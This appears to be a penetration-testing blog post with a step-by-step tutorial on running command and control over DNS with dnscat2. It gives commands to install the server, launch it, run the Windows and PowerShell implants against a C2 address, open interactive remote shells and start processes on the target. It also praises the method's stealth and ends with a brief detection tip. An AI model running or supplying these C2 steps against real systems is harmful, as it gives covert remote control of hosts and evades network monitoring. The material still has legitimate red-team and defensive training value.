Even in the most restricted environments DNS traffic should be allowed to resolve internal or external domains. This can be used as a communication channel between a target host and the command and control server. Commands and data are included inside DNS queries and responses therefore detection is difficult since arbitrary commands are hiding in legitimate traffic.

Implementation of this technique is possible with the use of Dnscat2 which can create a command and control channel over the DNS protocol. This tool uses a client (implant) which is based in C and it needs to be executed on the target in order for the server to receive a connection. Traffic is transmitted in an encrypted form and also it supports authentication via pre-shared secrets.

Installation of this tool is easy by following the commands below from a Kali Linux 2.0 machine.

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install
Dnscat2 - Download and Installation
Dnscat2 – Download and Installation

The command and control server can initiated by using the following command.

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
Dnscat2 - Server
Dnscat2 – Server

A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
Dnscat2 - Windows Client
Dnscat2 – Windows Client

From Dnscat2 the red teamer can start the interaction with the existing session that has been created:

session -i 1
Dnscat2 - Interactive Session
Dnscat2 – Interactive Session

By executing “help” a list of available commands for usage can be retrieved:

Dnscat2 - List of Commands
Dnscat2 – List of Commands

Part of the functionality of dnscat2 is to upload and download files, execute other programs and obtaining a remote shell.

Obtaining a shell is easy with the “shell” command which will open another session:

Dnscat2 - Shell
Dnscat2 – Shell

The following output will appear on the command prompt of the target:

Dnscat2 - Command Shell Request
Dnscat2 – Command Shell Request

The shell will be interactive and fast and all the commands will be transferred over DNS traffic:

Dnscat2 - Executing Shell Commands
Dnscat2 – Executing Shell Commands

Launching another program remotely is possible by calling the executable:

exec notepad.exe
Dnscat2 - Start New Process
Dnscat2 – Start New Process

Luke Baggett developed a PowerShell version of the implant which have been introduced and described in the blackhillsinfosec website. The commands are the same but additional features have been added like interactive PowerShell session and ability to  run scripts directly from memory.

The following command needs to be executed from a PowerShell session on the target:

PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

It is also possible to establish a direct PowerShell session by running the following:

exec psh
Dnscat2 - PowerShell
Dnscat2 – PowerShell

A new console will created with the ability to execute PowerShell commands and scripts:

Dnscat2 - PowerShell Command
Dnscat2 – PowerShell Command

Conclusion

There are various advantages of command and control over DNS with dnscat2. Some of them are:

  • Support of multiple sessions
  • Traffic encryption
  • Protection from MiTM attacks with secret key
  • Run PowerShell scripts directly from memory
  • Stealthy

Since detection is difficult due to the fact that arbitrary commands are transferred behind legitimate DNS traffic emphasis should be given to monitor the length of DNS queries and to allow hosts to communicate only with DNS servers that are trusted.

References

https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

PowerShell DNS Command & Control with dnscat2-powershell

3 Comments

Leave a Reply to Ogia Cancel reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s